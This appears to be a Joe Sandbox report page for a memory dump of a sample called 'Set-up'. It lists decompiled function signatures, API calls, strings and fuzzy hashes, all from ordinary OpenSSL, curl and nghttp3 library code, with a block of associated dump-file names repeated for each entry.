Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_get_uint
API String ID: 1297977491-1187682564
Opcode ID: 3c34c6cc576911d580320b12898563b996456be0f5fe97f925ada2f7e0bf1ee9
Instruction ID: 7e1e2a9b82a237d9679eb08153540f43d35edf19cee222c68485a3e3ecddb367
Opcode Fuzzy Hash: 3c34c6cc576911d580320b12898563b996456be0f5fe97f925ada2f7e0bf1ee9
Instruction Fuzzy Hash: 8C2138B6B54301B6D7203664BC47F6FA307CBD5B25F590127FB0C6B2C3FAA158A941A0

Function 00202240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,00202BF4,00000008), ref: 002022C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00202BF4,00000008), ref: 00202312

Strings

copy_integer, xrefs: 0020228B
general_set_uint, xrefs: 002022D2
crypto/params.c, xrefs: 00202295, 002022DC

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_set_uint
API String ID: 1297977491-3191580373
Opcode ID: e2c545f1046276a8e597383efe785c740d8233c1cd1c6ab45bbdc53cd3ea0cfa
Instruction ID: dfc9bc97d32aa3207798154224d26dfde232d57c96f0d4f259be9fa725859cb6
Opcode Fuzzy Hash: e2c545f1046276a8e597383efe785c740d8233c1cd1c6ab45bbdc53cd3ea0cfa
Instruction Fuzzy Hash: 98216170B28341EFDB346AA4AC8AF3A7349DBD5704F14016FFC05972C3EAA59C584261

Function 002040A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 002040C1

Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 0020411E

Strings

copy_integer, xrefs: 00204134
unsigned_from_signed, xrefs: 002040D3
crypto/params.c, xrefs: 002040DD, 0020413E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$unsigned_from_signed
API String ID: 2323844366-3781254518
Opcode ID: f63d7486fb65e14543cc7d6438b724dc43493abc48f1d2901c90de8041bd027b
Instruction ID: 08f919a020d1b9bf1a27563d6be90a3c11a34ff820ca063f654b5e9425a57e7e
Opcode Fuzzy Hash: f63d7486fb65e14543cc7d6438b724dc43493abc48f1d2901c90de8041bd027b
Instruction Fuzzy Hash: B90149F1B5830136E3303764BC43F6B2649CBE5B15F084635F708A72C3F6E568A44261

Function 0007088E Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

rwx-tTsS, xrefs: 00070391
, xrefs: 0007048E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: $rwx-tTsS
API String ID: 0-331890564
Opcode ID: 4ff7302202cce93b368fecc72bede96e23d362bd571b1a8640aaceb6081c5f0e
Instruction ID: 119a779b190b49f102b7300c5bab842dcd138b111d610bbca2e90f61474caa37
Opcode Fuzzy Hash: 4ff7302202cce93b368fecc72bede96e23d362bd571b1a8640aaceb6081c5f0e
Instruction Fuzzy Hash: 7EB15B70D08741DFE7788F14C4A473BB7E2EB51724F14CA0DD09A86A92D739E885CB9A

Function 000708B7 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

rwx-tTsS, xrefs: 00070391
, xrefs: 0007048E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: $rwx-tTsS
API String ID: 0-331890564
Opcode ID: 3fcc948cd44a8f9c607cd37fadce8533d265e8ed1a81592ace7cec70b6e2f0b1
Instruction ID: 40f144e5ea65781d2aa275be92828251d267054c970eef66c0d6c31afb3fe186
Opcode Fuzzy Hash: 3fcc948cd44a8f9c607cd37fadce8533d265e8ed1a81592ace7cec70b6e2f0b1
Instruction Fuzzy Hash: E8B18D70D08741DFE7788F14C0A473BB7E1EB51324F14CA0DD09A86A92D739E886CB9A

Function 000CE600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(005BF53C,nghttp3_qpack.c,00000811,?,?), ref: 000CE866
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,000D077F,?,?,00000000,00000000), ref: 000CE87B

Strings

nghttp3_qpack.c, xrefs: 000CE85C, 000CE871
space <= ctx->max_dtable_capacity, xrefs: 000CE876

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
API String ID: 1222420520-1270044496
Opcode ID: 1f8ceb2707eeb720649abfb49fb9120113f7ef0f12c1a623c521762593895370
Instruction ID: fffc6a74e66334cc528a71f7879df522a34315e631d93f0604c8a645027eeee3
Opcode Fuzzy Hash: 1f8ceb2707eeb720649abfb49fb9120113f7ef0f12c1a623c521762593895370
Instruction Fuzzy Hash: C181A0B5A006419FD720DF24D842F6AB7F5BF44318F08862CE88A97752EB31F965CB91

Function 000D8350 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 000D83AD
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(HOSTALIASES), ref: 000D83C5

Part of subcall function 000E77B0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,005C5FED,00000000,00000000,?,?,?,000E9882,?,00000000), ref: 000E77DD
Part of subcall function 000E77B0: fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 000E77F0
Part of subcall function 000E77B0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 000E7802

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000D853F

Strings

HOSTALIASES, xrefs: 000D83C0

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _stricmpfclosefopenfseekgetenvstrchr
String ID: HOSTALIASES
API String ID: 1675145106-255135673
Opcode ID: d6120b07775e559119c51d373695860ece39612d1cbf07f48c22a6444bc92d2a
Instruction ID: ec48a40540078f0189ae904af09d4797ef13df2bb61b24ec28c7d8aac4b3b410
Opcode Fuzzy Hash: d6120b07775e559119c51d373695860ece39612d1cbf07f48c22a6444bc92d2a
Instruction Fuzzy Hash: B151D8A1D083C25BE720DB21AD017BB72D89FE5348F00D92EFD8991253FB75D5948B62

Function 000281B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(000254E6), ref: 00028235
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 000282D4
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 000282E1

Strings

mime.c, xrefs: 0002824C, 000282B8, 0002832D, 00028342, 0002835E, 0002837A, 0002839C

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strrchr$_stat64
String ID: mime.c
API String ID: 2771713950-3378952128
Opcode ID: 8590c66ebfd42ed03e23e8a89c4f7df18272d1ef9cb0fa803a00a4af509c7929
Instruction ID: 689b0670d7b59fb892680b30ddfa020c378876dedd99cfaa175d743e1a3c8f3d
Opcode Fuzzy Hash: 8590c66ebfd42ed03e23e8a89c4f7df18272d1ef9cb0fa803a00a4af509c7929
Instruction Fuzzy Hash: 2E51B5B5A057109BEF10DF14EC867AB3BA4AF50B14F048168EC1C9F2C6FBB5DA158791

Function 000A6710 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?,00093B19,?,?,?,?,?), ref: 000A671D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000002C,?,?), ref: 000A682B

Strings

curl_ntlm_core.c, xrefs: 000A672F, 000A6865
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c, xrefs: 000A67FF

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c$curl_ntlm_core.c
API String ID: 1622878224-1914695719
Opcode ID: 50f53db0955f63d88a7a4cffe575c28dd72144828f2dd689271bfd7e81f57f34
Instruction ID: a0421edf7afc0d4efcdaa34c1308a92567cec6a1636eeddc1945123971ee4654
Opcode Fuzzy Hash: 50f53db0955f63d88a7a4cffe575c28dd72144828f2dd689271bfd7e81f57f34
Instruction Fuzzy Hash: FE418DB29087449BC314DF69C8816ABB7F4EFD9700F048A1EF9899B351E771E9848B52

Function 00064380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 000643D8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00064409
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00064457

Strings

curl_addrinfo.c, xrefs: 00064429, 000644C3

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: htonsmemcpystrlen
String ID: curl_addrinfo.c
API String ID: 2973076469-1838508774
Opcode ID: e3bf494b1dd74e13aff725668508a5f577c32e11ca9bf22b472c6e1fd202aaf1
Instruction ID: ac5a6449844a83501cbaad493a96d0a361f2744de6eeaf094685c21aa2fe6337
Opcode Fuzzy Hash: e3bf494b1dd74e13aff725668508a5f577c32e11ca9bf22b472c6e1fd202aaf1
Instruction Fuzzy Hash: 994198B5A04705AFD710CF58D881A6AB7E5FF98314F04892DFD898B351E770E990CB91

Function 00056650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0005665D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0005670E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0005671C

Strings

altsvc.c, xrefs: 00056699, 000566AB, 000566BD

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: altsvc.c
API String ID: 2413861649-3234676706
Opcode ID: 941c5a0ed9f7765199e9d9e9238449db3be34be02a13da645bf4a033aa7fe8a2
Instruction ID: 1ecf62e5cc35bfa80a2185b432e1831a425634dd60d4fc8212126964104a6227
Opcode Fuzzy Hash: 941c5a0ed9f7765199e9d9e9238449db3be34be02a13da645bf4a033aa7fe8a2
Instruction Fuzzy Hash: 4A31B4B1E08310ABE7509E20AC82E5F7BD4AF58755F444538FD4D9B242F672DD18C792

Function 000C42E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 000C435F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 000C43EF

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 000C435A, 000C43EA
nghttp3_conn.c, xrefs: 000C4355, 000C43E5

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 933de51f72ce2b9e4b9c6306510cb6da745c6631fa38785ce42437b44d6f5308
Instruction ID: 9420105480ff8d6cc4049a2439f3665d5c8d4a1730372ce05ec2dd6a6522a382
Opcode Fuzzy Hash: 933de51f72ce2b9e4b9c6306510cb6da745c6631fa38785ce42437b44d6f5308
